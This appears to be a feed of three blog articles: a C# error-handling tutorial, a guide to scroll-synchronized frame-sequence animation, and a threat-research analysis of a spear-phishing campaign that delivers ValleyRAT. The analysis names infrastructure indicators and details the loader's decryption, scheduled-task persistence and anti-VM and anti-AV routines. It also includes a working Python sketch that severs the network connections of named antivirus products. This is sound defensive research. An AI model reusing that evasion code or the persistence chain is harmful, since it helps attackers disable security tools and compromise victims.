    I could have thrown other custom exceptions that mimic the ones exposed by the library, but they would not have brought value to the overall system. In fact, the caller does not care that MyDownloader failed because the resource does not exist; it cares only that an error occurred when downloading a resource. It doesn’t even care that the exception was thrown by MyDownloader!

    So, when planning your exceptions, think of how they can be used by their clients rather than where they are thrown.

    Fighting the devil: null reference

    Everyone fights with null values. If you reference a null value, you will break the whole program with some ugly messages, like cannot read property of… in JavaScript, or with a NullReferenceException in C#.

    So, the best thing to do to avoid this kind of error is, obviously, to reduce the amount of possible null values in our code.

    We can deal with it in two ways: avoid returning null from a function and avoid passing null values to functions!

    How to avoid returning null values

    Unless you have specific reasons to return null, that is, when that value is acceptable in your domain, try not to return null.

    For string values, you can simply return an empty string, if it is considered an acceptable value.

    For lists of values, you should return an empty list.

    IEnumerable<char> GetOddChars(string value)
    {
        if (value.Length > 0)
        {
            // return something
        }
        else
        {
            return Enumerable.Empty<char>();
            // OR return new List<char>();
        }
    }
    

    In this way you can write something like this:

        var chars = GetOddChars("hello!");
        Console.WriteLine(chars.Count());
    
        foreach (char c in chars)
        {
            // Do Something
        }
    

    Without a single check on null values.

    What about objects? There are many approaches that you can take, like using the Null Object pattern
    which allows you to create an instance of an abstract class which does nothing at all, so that your code won’t care if the operations it does are performed on an actual object or on a Null Object.
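
    As a quick illustration of the pattern (my sketch, not from the book), a NullLogger is a valid Logger instance that deliberately does nothing, so callers never have to branch on null:

    public abstract class Logger
    {
        public abstract void Log(string message);
    }

    public class ConsoleLogger : Logger
    {
        public override void Log(string message) => Console.WriteLine(message);
    }

    // The Null Object: safe to call, performs no work
    public class NullLogger : Logger
    {
        public override void Log(string message) { }
    }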

    How to avoid passing null values to functions

    Well, since we’ve already avoided nulls in return values, we may expect that we will never pass them to our functions. Unfortunately, that’s not true: what if you were using external libraries to get some values and then used them in your functions?

    Of course, it’s better to check for null values before calling the function, and not inside the function itself; in this way, the meaning of the function is clearer and the code is more concise.

    public float CalculatePension(Person person, Contract contract, List<Benefit> benefits)
    {
        if (person != null)
        {
            // do something with the person instance
            if(contract != null && benefits != null)
            {
                // do something with the contract instance
                if(benefits != null)
                {
                    // do something
                }
            }
        }
        // what else?
    }
    

    … and now see what happens when you repeat those checks for every method you write.

    As they say, prevention is better than cure!
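
    If you do have to defend a public entry point, a common alternative (a sketch of mine, not the book’s) is to fail fast with guard clauses at the boundary, so the core logic stays flat:

    public float CalculatePension(Person person, Contract contract, List<Benefit> benefits)
    {
        // Fail fast at the boundary; everything below can assume valid inputs
        if (person is null) throw new ArgumentNullException(nameof(person));
        if (contract is null) throw new ArgumentNullException(nameof(contract));
        if (benefits is null) throw new ArgumentNullException(nameof(benefits));

        // actual calculation, free of nested null checks
        return 0f; // placeholder
    }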

    Progressive refinements

    It’s time to apply those tips in a real(ish) scenario. Let’s write a method that reads data from the file system, parses its content, and sends it to a remote endpoint.

    Initial implementation

    First step: read a stream from file system:

    (bool, Stream) ReadDataFromFile(string filePath)
    {
        if (!string.IsNullOrWhiteSpace(filePath))
        {
            Stream stream = ReadFromFileSystem(filePath);
    
            if (stream != null && stream.Length > 0)
                return (true, stream);
        }
    
        return (false, null);
    }
    

    This method returns a tuple with info about the existence of the file and the stream itself.

    Next, we need to convert that stream into plain text:

    string ConvertStreamIntoString(Stream fileStream)
    {
        return fileStream.ConvertToString();
    }
    

    Nothing fancy. Ah, ConvertToString does not really exist in the .NET world, but let’s fake it!

    Third step, we need to send the string to the remote endpoint.

    OperationResult SendStringToApi(string fileContent)
    {
        using (var httpClient = new HttpClient())
        {
            httpClient.BaseAddress = new Uri("http://some-address");
    
            HttpRequestMessage message = new HttpRequestMessage();
            message.Method = HttpMethod.Post;
            message.Content = ConvertToContent(fileContent);
    
            var httpResult = httpClient.SendAsync(message).Result;
    
            if (httpResult.IsSuccessStatusCode)
                return OperationResult.Ok;
            else if (httpResult.StatusCode == System.Net.HttpStatusCode.Unauthorized)
                return OperationResult.Unauthorized;
            else return OperationResult.GenericError;
        }
    }
    

    We use the native HttpClient .NET class to send our string to the remote endpoint, and then we fetch the result and map it to an enum, OperationResult.

    Hey, have you noticed it? I used an asynchronous method in a synchronous one using httpClient.SendAsync(message).Result. But it’s the wrong way to do it! If you want to know more, head to my article First steps with asynchronous programming in C#

    Finally, the main method.

    void Main()
    {
        (bool fileExists, Stream fileStream) = ReadDataFromFile("C:\some-path");
        if (fileExists)
        {
            string fileContent = ConvertStreamIntoString(fileStream);
            if (!string.IsNullOrWhiteSpace(fileContent))
            {
                var operationResult = SendStringToApi(fileContent);
                if (operationResult == OperationResult.Ok)
                {
                    Console.WriteLine("Yeah!");
                }
                else
                {
                    Console.WriteLine("Not able to complete the operation");
                }
            }
            else
            {
                Console.WriteLine("The file was empty");
            }
        }
        else
        {
            Console.WriteLine("File does not exist");
        }
    }
    

    Quite hard to understand, right? All those if-else do not add value to our code. We don’t manage errors in an alternate way, we just write on console that something has gone wrong. So, we can improve it by removing all those else blocks.

    void Main()
    {
        (bool fileExists, Stream fileStream) = ReadDataFromFile("C:\some-path");
        if (fileExists)
        {
            string fileContent = ConvertStreamIntoString(fileStream);
            if (!string.IsNullOrWhiteSpace(fileContent))
            {
                var operationResult = SendStringToApi(fileContent);
                if (operationResult == OperationResult.Ok)
                {
                    Console.WriteLine("Yeah!");
                }
            }
        }
    }
    

    A bit better! It definitely looks like the code I used to write. But we can do more. 💪

    A better way

    Let’s improve each step.

    Take the ReadDataFromFile method. The boolean value returned in the tuple is a flag and should be removed. How? Time to create a custom exception.

    What should we call this exception? DataReadException? FileSystemException? Since we should think of the needs of the caller, not of the method itself, a good name could be DataTransferException.

    Stream ReadDataFromFile(string filePath)
    {
        try
        {
            Stream stream = ReadFromFileSystem(filePath);
            if (stream != null && stream.Length > 0) return stream;
            else throw new DataTransferException($"file {filePath} not found or invalid");
        }
        catch (DataTransferException) { throw; }
        catch (Exception ex)
        {
            throw new DataTransferException($"Unable to get data from {filePath}", ex);
        }
    }
    

    We can notice 3 main things:

    1. we don’t check anymore if the filePath value is null, because we will always pass a valid string (to avoid null values as input parameters);
    2. if the stream is invalid, we throw a new DataTransferException exception with all the info we need;
    3. since we don’t know if the native classes to interact with file system will change and throw different exceptions, we wrap every error into our custom DataTransferException.

    Here I decided to remove the boolean value because we don’t have an alternate way to move on with the operations. If we had a fallback way to retrieve the stream (for example, from another source), we could have kept our tuple and performed the necessary checks.

    The ConvertStreamIntoString method does not do much; it just calls another method. If we have control over that ConvertToString, we can handle it like we did with ReadDataFromFile. Note that we don’t need to check whether the input stream is valid, because we have already done that in the ReadDataFromFile method.

    Time to update our SendStringToApi!

    Since we’re using an external class to perform HTTP requests (the native HttpClient), we’ll wrap our code into a try-catch-block and throw only exceptions of type DataTransferException; and since we don’t actually need a result, we can return void instead of that OperationResult enum.

    void SendStringToApi(string fileContent)
    {
        HttpClient httpClient = null;
        try
        {
            httpClient = new HttpClient();
            httpClient.BaseAddress = new Uri("http://some-address");
    
            HttpRequestMessage message = new HttpRequestMessage();
            message.Method = HttpMethod.Post;
            message.Content = ConvertToContent(fileContent);
            var httpResult = httpClient.SendAsync(message).Result;
    
            httpResult.EnsureSuccessStatusCode();
        }
        catch (Exception ex)
        {
            throw new DataTransferException("Unable to send data to the endpoint", ex);
        }
        finally
        {
            httpClient?.Dispose();
        }
    }
    

    Now we can finally update our Main method and remove all that clutter that did not bring any value to our code:

    void Main()
    {
        try
        {
            Stream fileStream = ReadDataFromFile("C:\some-path");
            string fileContent = ConvertStreamIntoString(fileStream);
            SendStringToApi(fileContent);
            Console.WriteLine("Yeah!");
        }
        catch (DataTransferException dtex)
        {
            Console.WriteLine($"Unable to complete the transfer: {dtex.Message}");
        }
        catch (Exception ex)
        {
            Console.WriteLine($"An error occurred: {ex.Message}");
        }
    }
    

    Finally, someone who reads our code has a clear idea of what’s going on, and of how information passes from one step to another.

    Much better, isn’t it?

    Wrapping up

    We’ve seen that writing good error handling is not as easy as it seems. You must consider a lot of things, like

    • choosing whether to use only exceptions or to rely also on status codes
    • defining which exceptions a method should throw and which ones it should catch (you can use TDD to plan for them easily)

    Also, remember that

    • external libraries may change or may be cumbersome, so you’d better wrap external classes into custom ones
    • exceptions should be client-oriented, to help callers understand what’s going on without unnecessary details

    Happy coding!




  • Creating Smooth Scroll-Synchronized Animation for OPTIKKA: From HTML5 Video to Frame Sequences

    Creating Smooth Scroll-Synchronized Animation for OPTIKKA: From HTML5 Video to Frame Sequences



    When OPTIKKA—a creative orchestration platform transforming traditional design workflows into intelligent, extensible systems—came to us at Zajno, we quickly defined a core visual metaphor: a dynamic, visually rich file system that expands as you scroll. Throughout design and development, we explored multiple iterations to ensure the website’s central animation was not only striking but also seamless and consistent across all devices.

    In this article, we’ll explain why we moved away from using HTML5 video for scroll-synchronized animation and provide a detailed guide on creating similar animations using frame sequences.

    The Initial Approach: HTML5 Video

    Why It Seemed Promising

    Our first idea was to use HTML5 video for the scroll-triggered animation, paired with GSAP’s ScrollTrigger plugin for scroll tracking. The approach had clear advantages:

    • Simplicity: Browsers support video playback natively.
    • Compactness: One video file instead of hundreds of images.
    • Compression: Video codecs efficiently reduce file size.

    // Initial approach with video element

    import gsap from 'gsap';
    import { ScrollTrigger } from 'gsap/ScrollTrigger';
    import Section from './Section'; // project-internal base class (path assumed)

    gsap.registerPlugin(ScrollTrigger);

    export default class VideoScene extends Section {
      private video: HTMLVideoElement;
      private scrollTrigger: ScrollTrigger;
      setupVideoScroll() {
        this.scrollTrigger = ScrollTrigger.create({
          trigger: '.video-container',
          start: 'top top',
          end: 'bottom bottom',
          scrub: true,
          onUpdate: (self) => {
            // Synchronize video time with scroll progress
    
            const duration = this.video.duration;
            this.video.currentTime = self.progress * duration;
          },
        });
      }
    }

    In reality, this approach had significant drawbacks:

    • Stuttering and lag, especially on mobile devices.
    • Autoplay restrictions in many browsers.
    • Loss of visual fidelity due to compression.

    These issues motivated a shift toward a more controllable and reliable solution.

    Transition to Frame Sequences

    What Is a Frame Sequence?

    A frame sequence consists of individual images played rapidly to create the illusion of motion—much like a film at 24 frames per second. This method allows precise control over animation timing and quality.

    Extracting Frames from Video

    We used FFmpeg to convert videos into individual frames and then into optimized web formats:

    1. Take the source video.
    2. Split it into individual PNG frames.
    3. Convert PNGs into WebP to reduce file size.
    // Extract frames as PNG sequence (Node ESM script; videoFile holds the source file name)

    import { exec } from 'child_process';
    import { promisify } from 'util';
    const execPromise = promisify(exec);

    console.log('🎬 Extracting PNG frames...');
    await execPromise(`ffmpeg -i "video/${videoFile}" -vf "fps=30" "png/frame_%03d.png"`);
    // Convert PNG sequence to WebP
    
    console.log('🔄 Converting to WebP sequence...');
    await execPromise(`ffmpeg -i "png/frame_%03d.png" -c:v libwebp -quality 80 "webp/frame_%03d.webp"`);
    console.log('✅ Processing complete!');

    Device-Specific Sequences

    To optimize performance across devices, we created at least two sets of sequences for different aspect ratios:

    • Desktop: Higher frame count for smoother animation.
    • Mobile: Lower frame count for faster loading and efficiency.
    // New image sequence based architecture
    
    export default abstract class Scene extends Section {
      private _canvas: HTMLCanvasElement;
      private _ctx: CanvasRenderingContext2D;
      private _frameImages: Map<number, HTMLImageElement> = new Map();
      private _currentFrame: { contents: number } = { contents: 1 };
      // Device-specific frame configuration
    
      private static readonly totalFrames: Record<BreakpointType, number> = {
        [BreakpointType.Desktop]: 1182,
        [BreakpointType.Tablet]: 880,
        [BreakpointType.Mobile]: 880,
      };
      // Offset for video end based on device type
    
      private static readonly offsetVideoEnd: Record<BreakpointType, number> = {
        [BreakpointType.Desktop]: 1500,
        [BreakpointType.Tablet]: 1500,
        [BreakpointType.Mobile]: 1800,
      };
    }

    We also implemented dynamic path resolution to load the correct image sequence depending on the user’s device type.

    // Dynamic path based on current breakpoint
    
    img.src = `/${this._currentBreakpointType.toLowerCase()}/frame_${paddedNumber}.webp`; // paddedNumber: zero-padded frame index, e.g. 001

    Intelligent Frame Loading System

    The Challenge

    Loading 1,000+ images without blocking the UI or consuming excessive bandwidth is tricky. Users expect instantaneous animation, but heavy image sequences can slow down the site.

    Stepwise Loading Solution

    We implemented a staged loading system:

    1. Immediate start: Load the first 10 frames instantly.
    2. First-frame display: Users see animation immediately.
    3. Background loading: Remaining frames load seamlessly in the background.
    await this.preloadFrames(1, countPreloadFrames);
    this.renderFrame(1);
    this.loadFramesToHash();
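
    The preloadFrames and loadFrame helpers are referenced here but not shown in the article; a plausible sketch of their shape, based on the Map cache and the dynamic path shown earlier (an assumption, not the project’s actual code):

    // Assumed helpers: load one frame into an HTMLImageElement and cache a range of them
    private loadFrame(frameNumber: number): Promise<HTMLImageElement> {
      return new Promise((resolve, reject) => {
        const img = new Image();
        const paddedNumber = String(frameNumber).padStart(3, '0');
        img.onload = () => resolve(img);
        img.onerror = reject;
        img.src = `/${this._currentBreakpointType.toLowerCase()}/frame_${paddedNumber}.webp`;
      });
    }

    private async preloadFrames(from: number, to: number): Promise<void> {
      for (let i = from; i <= to; i++) {
        if (!this._frameImages.has(i)) {
          this._frameImages.set(i, await this.loadFrame(i));
        }
      }
    }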

    Parallel Background Loading

    Using a ParallelQueue system, we:

    • Load remaining frames efficiently without blocking the UI.
    • Start from a defined countPreloadFrames to avoid redundancy.
    • Cache each loaded frame automatically for performance.
    // Background loading of all frames using parallel queue
    
    private loadFramesToHash() {
      const queue = new ParallelQueue();
    
      for (let i = countPreloadFrames; i <= totalFrames[this._currentBreakpointType]; i++) {
        queue.enqueue(async () => {
          const img = await this.loadFrame(i);
          this._frameImages.set(i, img);
        });
      }
    
      queue.start();
    }
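
    The ParallelQueue utility itself isn’t shown in the article either; a minimal sketch of the assumed shape (enqueue async tasks, then start a few concurrent workers that drain the queue):

    // Minimal ParallelQueue sketch (assumed shape, not the real implementation)
    class ParallelQueue {
      private tasks: Array<() => Promise<void>> = [];

      constructor(private concurrency = 4) {}

      enqueue(task: () => Promise<void>) {
        this.tasks.push(task);
      }

      start() {
        // Each worker pulls the next task until the queue drains
        const worker = async () => {
          let task: (() => Promise<void>) | undefined;
          while ((task = this.tasks.shift())) {
            await task();
          }
        };
        for (let i = 0; i < this.concurrency; i++) worker();
      }
    }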

    Rendering with Canvas

    Why Canvas

    Rendering frames in an HTML <canvas> element offered multiple benefits:

    • Instant rendering: Frames load into memory for immediate display.
    • No DOM reflow: Avoids repainting the page.
    • Optimized animation: Works smoothly with requestAnimationFrame.
    // Canvas rendering with proper scaling and positioning
    private renderFrame(frameNumber: number) {
      const img = this._frameImages.get(frameNumber);
      if (img && this._ctx) {
        // Clear previous frame
        this._ctx.clearRect(0, 0, this._canvas.width, this._canvas.height);
    
        // Handle high DPI displays
        const pixelRatio = window.devicePixelRatio || 1;
        const canvasRatio = this._canvas.width / this._canvas.height;
        const imageRatio = img.width / img.height;
    
        // Calculate dimensions for object-fit: cover behavior
        let drawWidth = this._canvas.width;
        let drawHeight = this._canvas.height;
        let offsetX = 0;
        let offsetY = 0;
    
        if (canvasRatio > imageRatio) {
          // Canvas is wider than image: overflow vertically and center
          drawWidth = this._canvas.width;
          drawHeight = this._canvas.width / imageRatio;
          offsetY = (this._canvas.height - drawHeight) / 2;
        } else {
          // Canvas is taller than image
          drawHeight = this._canvas.height;
          drawWidth = this._canvas.height * imageRatio;
          offsetX = (this._canvas.width - drawWidth) / 2;
        }
        // Draw image with proper scaling for high DPI
        this._ctx.drawImage(img, offsetX, offsetY, drawWidth / pixelRatio, drawHeight / pixelRatio);
      }
    }

    Limitations of <img> Elements

    While possible, using <img> for frame sequences presents issues:

    • Limited control over scaling.
    • Synchronization problems during rapid frame changes.
    • Flickering and inconsistent cross-browser rendering.
    // Auto-playing loop animation at the top of the page
    
    private async playLoop() {
      if (!this.isLooping) return;
      const startTime = Date.now();
      const animate = () => {
        if (!this.isLooping) return;
        // Calculate current progress within loop duration
    
        const elapsed = (Date.now() - startTime) % (this.loopDuration * 1000);
        const progress = elapsed / (this.loopDuration * 1000);
        // Map progress to frame number
    
        const frame = Math.round(this.loopStartFrame + progress * this.framesPerLoop);
        if (frame !== this._currentFrame.contents) {
          this._currentFrame.contents = frame;
    
          this.renderFrame(this._currentFrame.contents);
        }
        requestAnimationFrame(animate);
      };
      // Preload loop frames before starting animation
    
      await this.preloadFrames(this.loopStartFrame, this.loopEndFrame);
      animate();
    }

    Loop Animation at Page Start

    Canvas also allowed us to implement looping animations at the start of the page (the playLoop method shown above) with seamless transitions to scroll-triggered frames using GSAP.

    // Smooth transition between loop and scroll-based animation
    private handleScrollTransition(scrollProgress: number) {
      if (this.isLooping && scrollProgress > 0) {
        // Transition from loop to scroll-based animation
    
        this.isLooping = false;
        gsap.to(this._currentFrame, {
          duration: this.transitionDuration,
          contents: this.framesPerLoop - this.transitionStartScrollOffset,
          ease: 'power2.inOut',
          onComplete: () => (this.isLooping = false),
        });
      } else if (!this.isLooping && scrollProgress === 0) {
        // Transition back to loop animation
    
        this.preloadFrames(this.loopStartFrame, this.loopEndFrame);
        this.isLooping = true;
        this.playLoop();
      }
    }

    Performance Optimizations

    Dynamic Preloading Based on Scroll Direction

    We enhanced smoothness by preloading frames dynamically according to scroll movement:

    • Scroll down: Preload 5 frames ahead.
    • Scroll up: Preload 5 frames behind.
    • Optimized range: Only load necessary frames.
    • Synchronized rendering: Preloading happens in sync with the current frame display.
    // Smart preloading based on scroll direction
    
    _containerSequenceUpdate = async (self: ScrollTrigger) => {
      const currentScroll = window.scrollY;
      const isScrollingUp = currentScroll < this.lastScrollPosition;
      this.lastScrollPosition = currentScroll;
      // Calculate adjusted progress with end offset
    
      const totalHeight = document.documentElement.scrollHeight - window.innerHeight;
    
      const adjustedProgress = Math.min(1, currentScroll / (totalHeight - offsetVideoEnd[this._currentBreakpointType]));
      // Handle transition between states
    
      this.handleScrollTransition(self.progress);
      if (!this.isLooping) {
        const frame = Math.round(adjustedProgress * totalFrames[this._currentBreakpointType]);
        if (frame !== this._currentFrame.contents) {
          this._currentFrame.contents = frame;
          // Preload frames in scroll direction
    
          const preloadAmount = 5;
          await this.preloadFrames(
            frame + (isScrollingUp ? -preloadAmount : 1),
            frame + (isScrollingUp ? -1 : preloadAmount)
          );
          this.renderFrame(frame);
        }
      }
    };

    Results of the Transition

    Benefits

    • Stable performance across devices.
    • Predictable memory usage.
    • No playback stuttering.
    • Cross-platform consistency.
    • Autoplay flexibility.
    • Precise control over each frame.

    Technical Trade-offs

    • Increased bandwidth due to multiple requests.
    • Larger overall data size.
    • Higher implementation complexity with caching and preloading logic.

    Conclusion

    Switching from video to frame sequences for OPTIKKA demonstrated the importance of choosing the right technology for the task. Despite added complexity, the new approach provided:

    • Reliable performance across devices.
    • Consistent, smooth animation.
    • Fine-grained control for various scenarios.

    Sometimes, a more technically complex solution is justified if it delivers a better user experience.




  • Operation Silk Lure: Scheduled Tasks Weaponized for DLL Side-Loading (drops ValleyRAT)

    Operation Silk Lure: Scheduled Tasks Weaponized for DLL Side-Loading (drops ValleyRAT)


    Authors: Dixit Panchal, Soumen Burma & Kartik Jivani

    Table of Contents

    • Introduction:
    • Initial Analysis:
      • Analysis of Decoy:
      • Infection Chain:
    • Technical Analysis:
    • Infrastructure Hunting:
    • Conclusion:
    • Seqrite Coverage:
    • IoCs:
    • MITRE ATT&CK:

    Introduction:

    Seqrite Lab has been actively monitoring global cyber threat activity and has recently uncovered an ongoing campaign leveraging a Command and Control (C2) infrastructure hosted in the United States. The threat actors behind this operation are specifically targeting Chinese individuals seeking employment opportunities in the FinTech, cryptocurrency exchange, and trading platform sectors—particularly for engineering and technical roles.

    This campaign primarily employs sophisticated spear-phishing techniques. The adversaries craft highly targeted emails impersonating job seekers and send them to HR departments and technical hiring teams within Chinese firms. These emails often contain malicious .LNK (Windows shortcut) files embedded within seemingly legitimate résumés or portfolio documents. When executed, these .LNK files act as droppers, initiating the execution of payloads that facilitate initial compromise.

    Initial Analysis:

    Upon detailed analysis of the campaign, it was observed that the deployed malware establishes persistence within the compromised system and initiates various reconnaissance operations. These include capturing screenshots, harvesting clipboard contents, and exfiltrating critical system metadata. The collected data is covertly transmitted to a remote Command and Control (C2) server under the control of the threat actors. This exfiltrated information significantly elevates the risk of advanced cyber-espionage, identity theft, and credential compromise, thereby posing a serious threat to both organizational infrastructure and individual privacy.

    Analysis of Decoy:

    The PDF is a Chinese-language résumé for 李汉兵 (Li Hanbing), a senior backend/blockchain full-stack engineer (Java + Solidity) with experience building high-throughput trading systems and DeFi/smart-contract projects. It lists a bachelor’s degree from 华南农业大学 (South China Agricultural University, 2008–2012), work history in 惠州 (Huizhou) and 深圳 (Shenzhen) in Guangdong province, including founder/tech-lead roles, and many crypto/DeFi and high-concurrency trading system projects. The CV emphasizes Spring Cloud microservices, RocketMQ, MySQL, Solidity/Hardhat, and production experience with trading exchanges and DeFi protocols (TVL and customer counts are claimed).

    Evidence locating origin / country:

    • Language: the entire document is written in Simplified Chinese — typical for mainland China.
    • University: 华南农业大学 (South China Agricultural University)— a university located in Guangdong, China.
    • Work locations / companies: the CV mentions 惠州 (Huizhou) and 深圳 (Shenzhen) — both cities in Guangdong province, PRC. Company names like “惠州智灰兔科技有限公司 (Huizhou Zhihuitu Technology Co., Ltd.)” and “惠州市睿思通网络科技有限公司 (Huizhou Ruisitong Network Technology Co., Ltd.)” point to Chinese companies.
    • Platform reference: the file title in the PDF metadata/first line shows “拉勾网” — a Chinese tech job board (Lagou). That strongly suggests the résumé was created for/posted on a mainland-China recruiting platform.

    The resume is localized and credible for Chinese targets: Chinese language, Chinese universities, and local company names make it believable to Chinese users. That increases the chance a user will open it (social engineering).

    Infection Chain:

    Technical Analysis:

    During initial static analysis of the downloaded shortcut 李汉彬.lnk, we observed a command line of more than 260 characters consistent with a PowerShell payload. The command references a target file path (see snapshot), suggesting the LNK acts as a dropper/execution vector for a subsequent PowerShell-based stage.

    During initial analysis and parsing of the code, we discovered a notable indicator: the sample appears capable of downloading additional files (see snapshot).

    The sample connects to pan.tenire.com and downloads additional artifacts, including a decoy resume document, keytool.exe, CreateHiddenTask.vbs, and jli.dll.

    When we executed the sample LNK in our secure environment, it downloaded a second-stage payload to C:\Users\<user>\AppData\Roaming\Security and executed it.

    Additionally, the malware deploys a scheduled task via the CreateHiddenTask.vbs script. This task is designed to execute keytool.exe every day at 8:00 AM, ensuring persistence and regular execution of the malicious payload.

    The VBScript instantiates COM objects (WScript.Shell, Schedule.Service, Scripting.FileSystemObject), connects to the Task Scheduler, and programmatically creates a daily scheduled task named “Security” (trigger type = daily, StartBoundary = 2025-08-01T08:01:01, DaysInterval = 1) whose action executes %APPDATA%\Security\keytool.exe (constructed via ExpandEnvironmentStrings). It also sets the task registration metadata to Author = “Microsoft Corporation” (likely spoofing a benign author) and, after registering the task in the root folder, deletes the VBScript file itself to reduce forensic traces, effectively providing persistent, scheduled execution of the dropped payload.

    Analysis of Keytool and Jli.dll

    Upon analyzing keytool.exe, we found that it calls different export functions of Jli.dll, such as JLI_CmdToArgs, JLI_GetStdArgc, JLI_GetStdArgs, etc., as shown in the figure below.

    Upon analysing the loader Jli.dll, we found that it quietly opens its own executable (keytool.exe), reads a specific region derived from the PE headers, and scans that region for a distinct 8-byte marker sequence: 1C 3B 7E FF 1C 3B 7E FF. Once it finds the marker, everything after it is copied into a buffer and treated as an encrypted payload. The function then constructs a 256-byte S-box and runs the standard RC4 routine: a KSA (key scheduling algorithm) seeded with the ASCII key “123cba”, followed by the PRGA (pseudo-random generation algorithm), which XORs the keystream with the copied bytes to produce the decrypted payload.
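
    For reference, the RC4 routine described here is the standard, publicly documented algorithm; a generic Python illustration (not the malware’s own code) looks like this:

    def rc4(key: bytes, data: bytes) -> bytes:
        # KSA: build the 256-byte S-box from the key
        S = list(range(256))
        j = 0
        for i in range(256):
            j = (j + S[i] + key[i % len(key)]) % 256
            S[i], S[j] = S[j], S[i]

        # PRGA: generate a keystream and XOR it with the data
        out = bytearray()
        i = j = 0
        for byte in data:
            i = (i + 1) % 256
            j = (j + S[i]) % 256
            S[i], S[j] = S[j], S[i]
            out.append(byte ^ S[(S[i] + S[j]) % 256])
        return bytes(out)

    # e.g. rc4(b"123cba", payload_after_marker) would yield the decrypted shellcode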

    Inside Keytool.exe there is an encrypted shellcode payload — i.e. the malicious code is hidden and scrambled so that static analysis won’t detect it immediately.

    Once the shellcode is decrypted (at runtime, in memory), it reveals its built‑in command‑and‑control (C2) server address: 206.119.175.16.

    After decryption the routine calls a set of helper functions that appear to prepare and launch the payload (likely by creating or duplicating a process/handle and injecting or executing the decrypted data), performs a few process-related housekeeping calls, and finally waits on a handle to synchronize execution. In short: it’s a compact self-extracting loader — marker-based extraction + RC4 decryption using a fixed key — that drops an in-memory payload and then triggers its execution while waiting for completion.

    Analysis of 2nd Payload (ValleyRAT)

    Upon analyzing the second payload file, we found that it contains ValleyRAT code.

    System fingerprinting

    It collects CPU info, username, screen resolution, port number, uptime, NIC details, MAC, locale, VM check, registry values, and other identifiers.

    Function  One-line Purpose  Notes
    sub_1000BAD5  Opens HKLM\…\Tds\tcp, reads the PortNumber DWORD and appends its decimal value + \r\n.  Reads …\Tds\tcp\PortNumber.
    sub_1000BB8B  Reads GetTickCount() and appends formatted uptime (days/hours/minutes) + \r\n.  Simple uptime fingerprint; benign but useful for reconnaissance.
    sub_1000BC16  Enumerates HKCU\Software\Tencent\Plugin\VAS subkeys (6–11 chars) or scans the user folder for numeric directory names; appends space-separated results + \r\n.  Fingerprints QQ/Tencent accounts or numeric IDs; detect enumeration of that Tencent key or folder scans for numeric dir names.
    sub_1000BEEE  Uses NetBIOS (NCBENUM/NCBRESET/NCBASTAT) to obtain the NIC MAC, formats it as XX-XX-… and appends it + \r\n.  Legacy NetBIOS calls to read the MAC are uncommon in modern apps; monitor NetBIOS NCB usage.
    sub_1000C07D  Attempts to read the primary NIC DriverDesc from the device-class registry and append it + \r\n.
    Maps GetSystemDefaultUILanguage() to a stored locale string and appends it + \r\n (locale fingerprinting).  Checks whether the UI language is Taiwanese, Mainland Chinese, Hong Kong, Singapore, Macau, or English (US/UK).

    Anti-VM Tricks

    ValleyRAT checks for virtualization by looking for VirtualBox/VMware processes or the VMware registry key.

    AV Evasion

    It leverages COM/WMI to query ROOT\SecurityCenter2 for AntiVirusProduct, executes SELECT * FROM AntiVirusProduct, retrieves each displayName, and then converts/normalizes the results.
    Afterward, it invokes the function to locate and uninstall the detected AV products.

    Kill AV network connections

    This function repeatedly queries the system's TCP connection table using dynamically resolved APIs. It identifies processes associated with “360Safe”, “kingsoft”, or “Huorong” by checking the owning process path, and if a match is found, it forcefully terminates their TCP connections by setting the connection state to DELETE_TCB. Overall, it is an anti-AV routine designed to disrupt security software's network activity.
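
    The underlying API pattern (GetExtendedTcpTable to walk the connection table, then SetTcpEntry with state 12, DELETE_TCB) can be sketched in Python with ctypes. This assumes the offending PIDs have already been resolved from their process paths; the name matching and dynamic API resolution used by the sample are omitted.

    import ctypes
    from ctypes import wintypes

    iphlpapi = ctypes.WinDLL("iphlpapi")

    AF_INET = 2
    TCP_TABLE_OWNER_PID_ALL = 5
    MIB_TCP_STATE_DELETE_TCB = 12  # forces the stack to drop the connection

    class MIB_TCPROW_OWNER_PID(ctypes.Structure):
        _fields_ = [("dwState", wintypes.DWORD), ("dwLocalAddr", wintypes.DWORD),
                    ("dwLocalPort", wintypes.DWORD), ("dwRemoteAddr", wintypes.DWORD),
                    ("dwRemotePort", wintypes.DWORD), ("dwOwningPid", wintypes.DWORD)]

    class MIB_TCPROW(ctypes.Structure):
        _fields_ = [("dwState", wintypes.DWORD), ("dwLocalAddr", wintypes.DWORD),
                    ("dwLocalPort", wintypes.DWORD), ("dwRemoteAddr", wintypes.DWORD),
                    ("dwRemotePort", wintypes.DWORD)]

    def kill_tcp_connections(target_pids):
        # First call with a NULL buffer yields the required table size.
        size = wintypes.DWORD(0)
        iphlpapi.GetExtendedTcpTable(None, ctypes.byref(size), False,
                                     AF_INET, TCP_TABLE_OWNER_PID_ALL, 0)
        buf = ctypes.create_string_buffer(size.value)
        iphlpapi.GetExtendedTcpTable(buf, ctypes.byref(size), False,
                                     AF_INET, TCP_TABLE_OWNER_PID_ALL, 0)
        # Table layout: DWORD dwNumEntries followed by the row array.
        count = ctypes.cast(buf, ctypes.POINTER(wintypes.DWORD)).contents.value
        rows = (MIB_TCPROW_OWNER_PID * count).from_buffer(
            buf, ctypes.sizeof(wintypes.DWORD))
        for row in rows:
            if row.dwOwningPid in target_pids:
                # SetTcpEntry with DELETE_TCB tears down the connection
                # without touching the owning process (requires admin rights).
                dead = MIB_TCPROW(MIB_TCP_STATE_DELETE_TCB, row.dwLocalAddr,
                                  row.dwLocalPort, row.dwRemoteAddr, row.dwRemotePort)
                iphlpapi.SetTcpEntry(ctypes.byref(dead))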

    Exfiltration Activities through Commands

    The variant is designed to capture visual user activity (screenshots/recording) and to deliver and install plugins or other malicious payloads on the victim machine.

    Some of the supported command opcodes are listed below:

    Offset (Opcode) | Description
    0x78 (120) | Save IP list
    0x7B (123) | Session/HWID
    0x7D (125) | File/transfer handler
    0x83 (131) | Plugin update (216-byte header)
    0x84 (132) | Plugin install/add
    0x85 (133) | Filter management
    0x86 (134) | Screenshot config
    0x87 (135) | Clipboard config
    0x88 (136) | Keylogger control
    0x89 (137) | Recording / cleanup
    0x8A (138) | BoxedApp SDK init
    0xA1 (161) | Format/route frame
    0xA2 (162) | Self-uninstall
    0xA4 (164) | Group/Remark strings
    0xA5 (165) | Info sync
    0xA6 (166) | UI “OK”
    0xA7 (167) | Console profile
    0xC8 (200) | Transport/socket setup

    Malware’s keylogging capability

